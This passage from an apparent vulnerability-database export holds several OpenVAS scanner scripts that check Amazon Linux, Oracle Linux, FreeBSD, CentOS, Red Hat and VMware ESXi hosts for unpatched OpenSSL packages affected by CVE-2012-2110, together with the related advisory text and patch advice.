ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120152\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:18:42 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2012-72)\");\n script_tag(name:\"insight\", value:\"Multiple numeric conversion errors, leading to a buffer overflow, were found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data from BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER (Distinguished Encoding Rules) encoded data read from a file or other BIO input could cause an application using the OpenSSL library to crash or, potentially, execute arbitrary code. (CVE-2012-2110 )\");\n script_tag(name:\"solution\", value:\"Run yum update openssl to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2012-72.html\");\n script_cve_id(\"CVE-2012-2110\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"openssl-static\", rpm:\"openssl-static~1.0.0i~1.41.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.0i~1.41.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.0i~1.41.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~1.0.0i~1.41.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.0i~1.41.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:25", "description": "Oracle Linux Local Security Checks ELSA-2012-0518", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2012-0518", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123929", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123929", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-0518.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123929\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:10:26 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-0518\");\n script_tag(name:\"insight\", value:\"ELSA-2012-0518 - openssl security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-0518\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-0518.html\");\n script_cve_id(\"CVE-2012-2110\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8e~22.el5_8.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~0.9.8e~22.el5_8.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~0.9.8e~22.el5_8.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openssl097a\", rpm:\"openssl097a~0.9.7a~11.el5_8.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.0~20.el6_2.4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.0~20.el6_2.4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~1.0.0~20.el6_2.4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openssl-static\", rpm:\"openssl-static~1.0.0~20.el6_2.4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openssl098e\", rpm:\"openssl098e~0.9.8e~17.0.1.el6_2.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:06", "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "cvss3": {}, "published": "2012-04-30T00:00:00", "type": "openvas", "title": "FreeBSD Ports: openssl", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2018-10-05T00:00:00", "id": "OPENVAS:136141256231071273", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071273", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_openssl7.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID 7184f92e-8bb8-11e1-8d7b-003067b2972c\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71273\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2012-2110\");\n script_version(\"$Revision: 11762 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:59:26 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"FreeBSD Ports: openssl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following package is affected: openssl\n\nCVE-2012-2110\nThe asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL\nbefore 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not\nproperly interpret integer data, which allows remote attackers to\nconduct buffer overflow attacks, and cause a denial of service (memory\ncorruption) or possibly have unspecified other impact, via crafted DER\ndata, as demonstrated by an X.509 certificate or an RSA public key.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_xref(name:\"URL\", value:\"http://www.openssl.org/news/secadv_20120419.txt\");\n script_xref(name:\"URL\", value:\"http://marc.info/?l=full-disclosure&m=133483221408243\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/7184f92e-8bb8-11e1-8d7b-003067b2972c.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"openssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.0.1_1\")<0) {\n txt += \"Package openssl version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:16", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for openssl097a CESA-2012:0518 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881108", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881108", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for openssl097a CESA-2012:0518 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-April/018592.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881108\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:09:21 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-2110\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"CESA\", value:\"2012:0518\");\n script_name(\"CentOS Update for openssl097a CESA-2012:0518 centos5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssl097a'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"openssl097a on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\n and Transport Layer Security (TLS v1) protocols, as well as a\n full-strength, general purpose cryptography library.\n\n Multiple numeric conversion errors, leading to a buffer overflow, were\n found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data\n from BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER\n (Distinguished Encoding Rules) encoded data read from a file or other BIO\n input could cause an application using the OpenSSL library to crash or,\n potentially, execute arbitrary code. (CVE-2012-2110)\n\n All OpenSSL users should upgrade to these updated packages, which contain\n a backported patch to resolve this issue. For the update to take effect,\n all services linked to the OpenSSL library must be restarted, or the system\n rebooted.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl097a\", rpm:\"openssl097a~0.9.7a~11.el5_8.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8e~22.el5_8.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~0.9.8e~22.el5_8.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~0.9.8e~22.el5_8.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-02T10:57:45", "description": "Check for the Version of openssl", "cvss3": {}, "published": "2012-04-26T00:00:00", "type": "openvas", "title": "RedHat Update for openssl RHSA-2012:0518-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2017-12-28T00:00:00", "id": "OPENVAS:870589", "href": "http://plugins.openvas.org/nasl.php?oid=870589", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openssl RHSA-2012:0518-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\n and Transport Layer Security (TLS v1) protocols, as well as a\n full-strength, general purpose cryptography library.\n\n Multiple numeric conversion errors, leading to a buffer overflow, were\n found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data\n from BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER\n (Distinguished Encoding Rules) encoded data read from a file or other BIO\n input could cause an application using the OpenSSL library to crash or,\n potentially, execute arbitrary code. (CVE-2012-2110)\n\n All OpenSSL users should upgrade to these updated packages, which contain\n a backported patch to resolve this issue. For the update to take effect,\n all services linked to the OpenSSL library must be restarted, or the system\n rebooted.\";\n\ntag_affected = \"openssl on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-April/msg00021.html\");\n script_id(870589);\n script_version(\"$Revision: 8253 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-28 07:29:51 +0100 (Thu, 28 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-26 10:35:51 +0530 (Thu, 26 Apr 2012)\");\n script_cve_id(\"CVE-2012-2110\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2012:0518-01\");\n script_name(\"RedHat Update for openssl RHSA-2012:0518-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of openssl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8e~22.el5_8.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~0.9.8e~22.el5_8.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~0.9.8e~22.el5_8.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~0.9.8e~22.el5_8.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl097a\", rpm:\"openssl097a~0.9.7a~11.el5_8.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl097a-debuginfo\", rpm:\"openssl097a-debuginfo~0.9.7a~11.el5_8.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:11:03", "description": "The remote ESXi is missing one or more security related Updates from VMSA-2013-0003.", "cvss3": {}, "published": "2013-02-27T00:00:00", "type": "openvas", "title": "VMSA-2013-0003 VMware vCenter Server, ESXi and ESX address an NFC Protocol memory corruption and third party library security issues.", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110", "CVE-2013-1659"], "modified": "2017-05-04T00:00:00", "id": "OPENVAS:103672", "href": "http://plugins.openvas.org/nasl.php?oid=103672", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_VMSA-2013-0003.nasl 6065 2017-05-04 09:03:08Z teissa $\n#\n# VMSA-2013-0003 VMware vCenter Server, ESXi and ESX address an NFC Protocol memory corruption and third party library security issues.\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"The remote ESXi is missing one or more security related Updates from VMSA-2013-0003.\";\ntag_insight = \"VMware has updated VMware vCenter Server, ESXi and ESX to address\na vulnerability in the Network File Copy (NFC) Protocol. This update\nalso addresses multiple security vulnerabilities in third party\nlibraries used by VirtualCenter, ESX and ESXi.\n\nRelevant releases\n\nVMware vCenter Server 5.1 prior to 5.1.0b \nVMware vCenter Server 5.0 prior to 5.0 Update 2 \nVMware vCenter Server 4.0 prior to Update 4b \nVMware VirtualCenter 2.5 prior to Update 6c\n\nVMware ESXi 5.1 without ESXi510-201212101-SG \nVMware ESXi 5.0 without ESXi500-201212102-SG \nVMware ESXi 4.1 without ESXi410-201301401-SG \nVMware ESXi 4.0 without ESXi400-201302401-SG \nVMware ESXi 3.5 without ESXe350-201302401-I-SG and ESXe350-201302403-C-SG\n\nVMware ESX 4.1 without ESX410-201301401-SG \nVMware ESX 4.0 without ESX400-201302401-SG \nVMware ESX 3.5 without ESX350-201302401-SG\n\nProblem Description\n\na. VMware vCenter, ESXi and ESX NFC protocol memory corruption\n vulnerability\n\nVMware vCenter Server, ESXi and ESX contain a vulnerability in the\nhandling of the Network File Copy (NFC) protocol. To exploit this\nvulnerability, an attacker must intercept and modify the NFC \ntraffic between vCenter Server and the client or ESXi/ESX and the\nclient. Exploitation of the issue may lead to code execution.\n\nTo reduce the likelihood of exploitation, vSphere components should\nbe deployed on an isolated management network.\n\nb. VirtualCenter, ESX and ESXi Oracle (Sun) JRE update 1.5.0_38\n\nOracle (Sun) JRE is updated to version 1.5.0_38, which addresses\nmultiple security issues that existed in earlier releases of\nOracle (Sun) JRE. \n\nOracle has documented the CVE identifiers that are addressed\nin JRE 1.5.0_38 in the Oracle Java SE Critical Patch Update\nAdvisory of October 2012. \n\nc. Update to ESX service console OpenSSL RPM \n\nThe service console OpenSSL RPM is updated to version \nopenssl-0.9.7a.33.28.i686 to resolve multiple security issues.\n\nSolution\nApply the missing patch(es).\";\n\n\n\nif (description)\n{\n script_id(103672);\n script_cve_id(\"CVE-2013-1659\",\"CVE-2012-2110\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_version (\"$Revision: 6065 $\");\n script_name(\"VMSA-2013-0003 VMware vCenter Server, ESXi and ESX address an NFC Protocol memory corruption and third party library security issues.\");\n\n\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-04 11:03:08 +0200 (Thu, 04 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-27 11:04:01 +0100 (Wed, 27 Feb 2013)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esxi_init.nasl\");\n script_mandatory_keys(\"VMware/ESXi/LSC\",\"VMware/ESX/version\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://lists.vmware.com/pipermail/security-announce/2013/000205.html\");\n exit(0);\n}\n\ninclude(\"vmware_esx.inc\");\ninclude(\"version_func.inc\");\n\nif(!get_kb_item('VMware/ESXi/LSC'))exit(0);\nif(!esxVersion = get_kb_item(\"VMware/ESX/version\"))exit(0);\n\npatches = make_array(\"4.0.0\",\"ESXi400-201302401-SG\",\n \"4.1.0\",\"ESXi410-201301401-SG\",\n \"5.0.0\",\"VIB:tools-light:5.0.0-1.25.912577\",\n \"5.1.0\",\"VIB:esx-base:5.1.0-0.8.911593\");\n\nif(!patches[esxVersion])exit(0);\n\nif(_esxi_patch_missing(esxi_version:esxVersion, patch:patches[esxVersion])) {\n\n security_message(port:0);\n exit(0);\n\n}\n\nexit(99);\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:12", "description": "The remote ESXi is missing one or more security related Updates from VMSA-2013-0003.", "cvss3": {}, "published": "2013-12-03T00:00:00", "type": "openvas", "title": "VMSA-2013-0003 VMware vCenter Server, ESXi and ESX address an NFC Protocol memory corruption and third party library security issues. (remote check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110", "CVE-2013-1659"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310103849", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103849", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_VMSA-2013-0003_remote.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# VMSA-2013-0003 VMware vCenter Server, ESXi and ESX address an NFC Protocol memory corruption and third party library security issues (remote check).\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103849\");\n script_cve_id(\"CVE-2013-1659\", \"CVE-2012-2110\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 11865 $\");\n script_name(\"VMSA-2013-0003 VMware vCenter Server, ESXi and ESX address an NFC Protocol memory corruption and third party library security issues. (remote check)\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-12-03 15:04:01 +0100 (Tue, 03 Dec 2013)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esx_web_detect.nasl\");\n script_mandatory_keys(\"VMware/ESX/build\", \"VMware/ESX/version\");\n\n 